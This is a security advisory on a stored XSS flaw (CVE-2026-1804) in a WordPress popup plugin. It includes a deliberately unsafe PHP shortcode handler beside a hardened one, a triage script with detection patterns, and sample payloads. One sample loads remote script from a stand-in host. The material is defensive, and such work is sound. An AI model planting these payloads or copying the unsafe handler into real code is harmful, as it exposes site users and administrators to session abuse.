Attack Vectors
WDES Responsive Popup (slug: wdes-responsive-popup) has a Medium severity vulnerability (CVSS 6.4, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) tracked as CVE-2026-1804. The issue affects all versions up to and including 1.3.6.
The primary attack path is through an authenticated WordPress account with at least Contributor permissions. An attacker with this access can place a crafted wdes-popup-title shortcode on a page or post and use the attr shortcode attribute to inject script content that is then saved (stored) in your site’s content.
Because this is stored cross-site scripting (XSS), the payload sits in post content and runs in the browser of anyone who renders that page, with no link to click and no further action by the victim. A Contributor cannot publish, but shortcodes also render in post preview, so the first victim is typically the Editor or Administrator who opens the pending post to review it.
Security Weakness
This vulnerability exists because WDES Responsive Popup does not adequately sanitize and safely output user-supplied shortcode attributes. Specifically, insufficient input sanitization and output escaping of the attr value in the wdes-popup-title shortcode can allow script injection to be stored in the database and rendered to site visitors.
In practical terms, the plugin trusts content that should be treated as untrusted. Contributors do not hold the unfiltered_html capability, and WordPress's KSES filter strips script tags and inline event handlers from the HTML they save, but a shortcode's attributes are plain bracketed text, not HTML, so the value passes through storage untouched and only becomes markup when the plugin renders the shortcode. That is why every shortcode handler has to escape its own output for the context it writes into; relying on what happened at save time is not enough.
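As an added illustration of the bug class (this is not the plugin's code and not something taken from the advisory), here is a shortcode handler written the unsafe way described above, beside a hardened version. The tag name and the attr attribute come from the advisory; the handler bodies, the default values, the alignment allow-list and the stand-in definitions of shortcode_atts, esc_attr and esc_html are assumptions so the file runs under plain php outside WordPress, where the real functions take over.

```php
<?php
// Added illustration of the bug class, not WDES Responsive Popup's real code.
// The tag name and the "attr" attribute follow the advisory; the handler bodies,
// the default values and the alignment allow-list are assumptions for the demo.

// Stand-ins so the file runs under plain `php` outside WordPress. Inside
// WordPress the real functions exist and these are skipped. They approximate
// core behaviour (the real esc_* functions also normalise encoding first).
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, $atts): array
    {
        $atts = (array) $atts;
        $out  = [];
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text): string
    {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text): string
    {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// UNSAFE: the attribute value is trusted and concatenated into the tag.
// WordPress strips the quotes around a shortcode attribute, so a value such as
// onmouseover=alert(1) lands inside the <h2> as a live event handler.
function wdes_popup_title_unsafe($atts): string
{
    $a = shortcode_atts(['title' => '', 'attr' => ''], $atts);
    return '<h2 class="wdes-popup-title" ' . $a['attr'] . '>' . $a['title'] . '</h2>';
}

// HARDENED: the attribute is data, never markup. A value that steers the
// markup goes through an allow-list; everything printed is escaped for the
// context it lands in (attribute value vs. text node).
function wdes_popup_title_safe($atts): string
{
    $a = shortcode_atts(['title' => '', 'attr' => ''], $atts);
    $allowed = ['left', 'center', 'right'];
    $align = in_array($a['attr'], $allowed, true) ? $a['attr'] : 'left';
    return '<h2 class="wdes-popup-title wdes-align-' . esc_attr($align) . '">'
        . esc_html($a['title']) . '</h2>';
}

// In a plugin this is how the hardened handler would be registered.
if (function_exists('add_shortcode')) {
    add_shortcode('wdes-popup-title', 'wdes_popup_title_safe');
}

// Regression check on a handler's output: true when some tag in the rendered
// HTML still carries a script vector (a <script> tag, an inline event handler
// or a javascript: URL). Only tags are inspected, so escaped text such as
// "&lt;img onerror=...&gt;" is correctly treated as inert.
function wdes_output_has_script_vector(string $html): bool
{
    if (!preg_match_all('/<[a-zA-Z][^>]*>/', $html, $m)) {
        return false;
    }
    foreach ($m[0] as $tag) {
        if (preg_match('/^<script\b|\s+on[a-z]+\s*=|javascript:/i', $tag)) {
            return true;
        }
    }
    return false;
}

// Constructed input: the attribute array WordPress would hand the handler for
// [wdes-popup-title title="Sale <img src=x onerror=alert(1)>"
//                   attr="onmouseover=alert(document.cookie)"]
$payload = [
    'title' => 'Sale <img src=x onerror=alert(1)>',
    'attr'  => 'onmouseover=alert(document.cookie)',
];

$unsafe = wdes_popup_title_unsafe($payload);
$safe   = wdes_popup_title_safe($payload);

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";
echo 'unsafe has vector: ' . var_export(wdes_output_has_script_vector($unsafe), true) . "\n";
echo 'safe has vector:   ' . var_export(wdes_output_has_script_vector($safe), true) . "\n";
```

The hardened handler does two separate things, and both are needed: the allow-list stops attacker-chosen text from steering the tag at all, and the esc_attr/esc_html calls make sure that whatever is printed cannot change the HTML context it is printed into. Escaping alone would have been enough for the title; the allow-list is what lets a free-form attribute influence markup without trusting it.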
Remediation note: per the published advisory, no patch is available at the time of writing. Mitigation depends on risk tolerance; in most environments the safest option is to deactivate and remove the plugin and replace it. Removing the plugin stops the shortcode from rendering (WordPress prints an unregistered shortcode as literal text), but it leaves any planted shortcode text in post content and post revisions, so review content created by Contributor-level accounts as part of the cleanup. Any replacement must escape its own shortcode output, or the same class of bug simply returns under a different name.
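Since there is no patch, the practical question for an operator is whether anyone has already planted a payload. The triage script below is an added example, not code from the plugin, the advisory, or WordPress core: it pulls wdes-popup-title shortcodes out of post content and flags attribute values that look like markup or script. The tag and the attr attribute follow the advisory; the attribute-splitting regex is an approximation of WordPress's own shortcode_parse_atts(), and the sample posts at the bottom are constructed so the script runs offline under plain php.

```php
<?php
// Added triage helper, not part of the plugin or the advisory. It pulls
// [wdes-popup-title ...] shortcodes out of post content and flags attribute
// values that look like markup or script. The tag and the "attr" attribute
// follow the advisory; the sample posts at the bottom are constructed.

// Returns every wdes-popup-title shortcode in $content as a list of
// attribute maps (lower-cased name => raw value).
function wdes_find_popup_shortcodes(string $content): array
{
    $found = [];
    if (!preg_match_all('/\[wdes-popup-title(?=[\s\]])([^\]]*)\]/i', $content, $tags)) {
        return $found;
    }
    // name="value", name='value' or name=value, close to how WordPress's
    // shortcode_parse_atts() splits an attribute string (approximation).
    $pairRe = '/([a-zA-Z0-9_-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))/';
    foreach ($tags[1] as $attrString) {
        $atts = [];
        preg_match_all($pairRe, $attrString, $pairs, PREG_SET_ORDER);
        foreach ($pairs as $p) {
            // Whichever quoting alternative matched holds the value; the
            // others are empty or absent.
            $value = $p[2] ?? '';
            if ($value === '') { $value = $p[3] ?? ''; }
            if ($value === '') { $value = $p[4] ?? ''; }
            $atts[strtolower($p[1])] = $value;
        }
        $found[] = $atts;
    }
    return $found;
}

// True when a value carries something a plain-text shortcode attribute never
// needs: angle brackets, an inline event handler, or a javascript:/data: URL.
// Entities are decoded first so &lt;script&gt; is not missed.
function wdes_attr_looks_malicious(string $value): bool
{
    $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return (bool) preg_match('/[<>]|\bon[a-z]+\s*=|javascript:|data:/i', $decoded);
}

// Walks rows of (id, author, status, content) and returns each suspicious
// shortcode attribute together with the post it was found in.
function wdes_triage_posts(array $posts): array
{
    $hits = [];
    foreach ($posts as $post) {
        foreach (wdes_find_popup_shortcodes($post['content']) as $atts) {
            foreach ($atts as $name => $value) {
                if (wdes_attr_looks_malicious($value)) {
                    $hits[] = [
                        'id'        => $post['id'],
                        'author'    => $post['author'],
                        'status'    => $post['status'],
                        'attribute' => $name,
                        'value'     => $value,
                    ];
                }
            }
        }
    }
    return $hits;
}

// Constructed sample rows: one legitimate use and two planted payloads.
$posts = [
    ['id' => 101, 'author' => 'editor',  'status' => 'publish',
     'content' => 'Welcome! [wdes-popup-title title="Spring sale" attr="center"]'],
    ['id' => 102, 'author' => 'contrib', 'status' => 'pending',
     'content' => '[wdes-popup-title title="Hi" attr="onmouseover=alert(document.cookie)"]'],
    ['id' => 103, 'author' => 'contrib', 'status' => 'draft',
     'content' => 'Text [wdes-popup-title attr=\'"><script src=//example.invalid/x.js></script>\'] more'],
];

foreach (wdes_triage_posts($posts) as $hit) {
    printf("post %d (%s, %s): %s=%s\n",
        $hit['id'], $hit['author'], $hit['status'], $hit['attribute'], $hit['value']);
}
```

On a live site, feed wdes_triage_posts() the rows returned by a query such as SELECT ID, post_author, post_status, post_content FROM wp_posts WHERE post_content LIKE '%[wdes-popup-title%' (via $wpdb->get_results() or an export from wp db query). Do not restrict it to published posts or to post_type post and page: a pending or draft post is exactly what a Contributor produces, and revisions keep the payload even after the visible content is cleaned. Treat the output as a filter for manual review rather than a verdict; the pattern is intentionally broad and will flag some legitimate values.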
Technical or Business Impacts
Stored XSS can create business risk that extends beyond “a website bug.” If a malicious script runs in a visitor’s browser, it can undermine trust and alter how your brand is experienced—particularly on high-traffic landing pages, campaign pages, and lead-capture flows.
Potential impacts include:
Brand and reputation damage: Visitors may see unexpected popups, content changes, redirects, or other behavior that erodes confidence in your organization’s professionalism and security posture.
Customer and employee risk: If privileged users (marketing admins, site admins, editors) view an injected page, the script runs in their authenticated browser session. WordPress authentication cookies are HttpOnly and cannot be read directly, but the script can issue requests to wp-admin and the REST API that carry those cookies and harvest the nonces those pages embed, which is enough to create users, change settings or install further code. That is how a Contributor-level foothold becomes full site compromise.
Compliance and audit concerns: For regulated organizations, a web security incident—even without service downtime—can trigger incident response obligations, documentation requirements, and uncomfortable questions about access controls and third-party software governance.
Campaign performance and revenue impact: Any disruption to on-site user journeys (forms, tracking, conversion flows) can reduce lead quality and conversion rates, and may require pausing campaigns while the site is remediated.
Injected scripts on high-traffic pages are not a theoretical concern. The British Airways and Ticketmaster incidents involved scripts injected through a compromised payment page and compromised third-party code rather than a plugin XSS bug, but the result for visitors was the same: code the site owner never intended, executing in their browsers. For context, see: British Airways payment-page script injection coverage, Ticketmaster breach linked to third-party scripts, and the Wordfence advisory for this issue.